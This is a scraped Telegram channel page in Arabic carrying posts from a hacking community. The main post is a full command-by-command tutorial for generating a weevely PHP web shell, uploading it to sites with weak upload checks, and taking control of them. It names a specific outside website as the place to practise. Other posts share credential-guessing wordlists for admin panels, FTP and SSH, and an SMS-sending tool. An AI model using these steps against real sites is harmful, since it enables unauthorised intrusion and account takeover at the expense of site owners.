ERROR 404 BULLET MHS
Admin : @wahtis القناة متوقفة حاليًا . سبحان الله وبحمده , سبحان الله العظيم
إظهار المزيدلم يتم تحديد البلدلم يتم تحديد اللغةالفئة غير محددة
1 152
المشتركون
لا توجد بيانات24 ساعات
لا توجد بيانات7 أيام
لا توجد بيانات30 أيام
- المشتركون
- التغطية البريدية
- ER - نسبة المشاركة
جاري تحميل البيانات...
معدل نمو المشترك
جاري تحميل البيانات...
مجتمع عربي مشترك خاص بالبرمجة وأمن المعلومات
https://t.me/Hackers_Of_Arabs
Hackers of Arabs
المجموعة الرسمية والوحيدة مجتمع عربي مشترك خاص بالبرمجة وأمن المعلومات http://dontasktoask.com/ar http://nohello.net هاشتاغات مهمة : #security #book , #books #courses #tips الغروب تابع لقناتين
https://t.me/ProjectSigmaTeamhttps://t.me/ObaidaIsmailDB
💻 - إصدار جديد للاداة :
$ git clone https://github.com/X-HACKRAWI/FreeSms
$ cd FreeSms
$ bash Run.sh
قم باختيار الخيار الذي تريد ويستحسن اختيار الرقم 3 اولا لحل المشاكل قبل كل شيء وبعد الانتهاء قم باختيار الرقم 1 لتشغيل الاداة
سيطلب منك اولا مفتاح الدولة ( فقط ) :
وبعد ان تقوم بادخاله سيطلب منك الرقم وحسب وبعدها النص الذي تريد للرساله سيكون من السهل الكتابه بالانجليزيه ولكن اذا اردت الكتابة بالعربيه قم بالكتابة في اي مكان اخر مثل المذكره الخاصه بالهاتف ثم قم بلصق النص وحسب
💡 - في اليوم الواحد يسمح رساله واحده وحسب تفاصيل اكثر في الشرح السابق
👨💻 - مطور الاداة :
@HackRawi
اكثر الاشياء الي استخدمها في curl
----------------------
-H
تضيف لك header مع الطلب
-A
تعدل على الuser agent
-X
تحدد نوع الطلب
-s
ما تعرض تحميل للرابط
-i
تعرض الطلب مع الاستجابه
----------------------
🎲 - اداة weevely :
⭕️ - اداة مخصصة لاختبار اختراق المواقع فهي تقوم برفع Shell على الموقع والتحكم به وكما انها سهلة الاستخدام سنقوم بشرحها عملياً على احد المواقع من انشاء ملف Shell حتى التحكم بالموقع
[+] - كما ان الاداة تسمح لنا بجلب قواعد بيانات Sql ورفع ملفات او سحب ملفات وغيرها.
[-] - اولاً يمكنكم تحميل الاداة بهذه الطريقه فقط قم بكتابة ما بعد [ # ]
bullet@mhs:~# git clone https://github.com/epinna/weevely3
🖱 - بعد ان قمنا بتحميلها نقوم بالدخول إلى ملف الاداة
bullet@mhs:~# cd weevely3/
🗜 - سنرى العديد من الملفات ما يهمنا هو ملفين فقط وهم
1- requirements.txt
2- weevely.py
ويمكنك قراءه ال Reademe ايضا لا احد سيقوم بمنعك يا عزيزي
📡 - الملف الاول فيه اسماء المكاتب التي قد تكون غير مثبته على النظام الذي تستخدمه ولكي لا تواجهك اي مشاكل فقط قم بكتابة
bullet@mhs:~# pip install -r requirements.txt
💡- الان حان وقت انشاء الملف الخبيث او الجيد من نضرك !
نقوم بكتابة :
bullet@mhs:~# python weevely.py generate bullet#123|mhs $HOME/mhs.php
مالذي مكتوب في الاعلى ?
اولا قمنا بتشغيل الاداه عبر python وبعدها ملف الاداة ثم قمت باستخدام الخيار
generate
وهو احد الخيارات في الاداة للانشاء ثم بعدها قمت بعمل كلمة سر الا وهي
bullet#123|mhs
ما فائده كلمة السر ?
وكيف استخدمها ?
لا تستعجل ساخبرك حينما نصل يا عزيزي !
ثم بعدها قمت باختيار المسار الذي سينحفظ فيه الملف وهو
$HOME/mhs.php
الان نقوم برفع الملف على بعض المواقع التي لا تقوم بالتحقق من محتوى الملفات
يمكنك التجربه على هذا الموقع والذي سارفق صور بالاسفل توضح بعض المفاهيم في الشرح :
www.codesoft.sd
الان وبعد ان قمنا بتجهيز الملف ورفعه نقوم بجلب مسار الملف بعد ان تم رفعه وهناك العديد من الطرق اولا اما الموقع بنفسه سيقوم باظهار المسار او قم بالدخول إلى ملف Uploads الذي قد يعتبره المطور لا ضرر باضهاره وانت قم بالبحث عن اسم ملفك بينهم
وبعد ان تقوم بجلب المسار مع اسم الموقع نقوم بفتح التيرمنال وكتابة :
ِbullet@mhs:~# python weevely.py www.codesoft.sd/mhs.php bullet#123|mhs
بعد ان قمنا بتشغيل الاداه قمنا بنفس السطر بعمل المسار الذي يتواجد فيه الملف الخاص بنا ثم مسافة ثم كلمة السر الخاصه بنا فتخيل اذا كان بدون كلمة سر هل من الجيد ان ياتي شخص اخر ويقوم بسرقة مجهودك ?
بعدها سيقوم بفتح جلسة مع الموقع مع اظهار
weevely>
يمكنك كتابة help لاستعراض الاوامر
🎲 - إذا كنت ترى خطا مني او بشيء ناقص قم بكتابته في التعليقات
🔓 - للمزيد انضم على قناتنا :
⚙ - https://t.me/Penetration_TestingAr
epinna/weevely3
Weaponized web shell. Contribute to epinna/weevely3 development by creating an account on GitHub.
🎲 - من افضل الملفات التي قد تراها من اجل التخمين على لوحات الادمن في المواقع مثل Cpanel او WordPress وغيرها
🔧 - او بعض البروتوكولات مثل FTP و SSH
🗂 - فهو يحتوي على اكثر من 40 ملف كل ملف خاص بشيء معين واستخدامها سهل جدا !
كلمة السر الخاصه بالملف :
🔐 - BULLETMHS
⭕️ - الملف ماخوذ من Github رايته رائع فشاركته معكم 🦦
للمزيد إنضم إلينا على التيليجرام عبر الرابط التالي :
- https://t.me/Penetration_TestingAr
ERROR 404 BULLET MHS
Admin : @BULLETMHS
🎲 - تطبيق Linux Commands:
🌐 - تطبيق يستعرض لك " كل " الاوامر المخصصه لـ Linux كما انه مقسم إلى عدة اقسام ومنها
قسم للتحكم بالنظام وقسم للمستخدمين والمجموعات وقسم للشبكات وقسم للبحث وقسم لادوات اختبار الاختراق وغيرها من الاقسام
كما انه يعلمك اسرار ممتعه في لينكس مثل !! و * و ?
اتمنى ان ينال اعجابكم
اختر خطة مختلفة
تسمح خطتك الحالية بتحليلات لما لا يزيد عن 5 قنوات. للحصول على المزيد، يُرجى اختيار خطة مختلفة.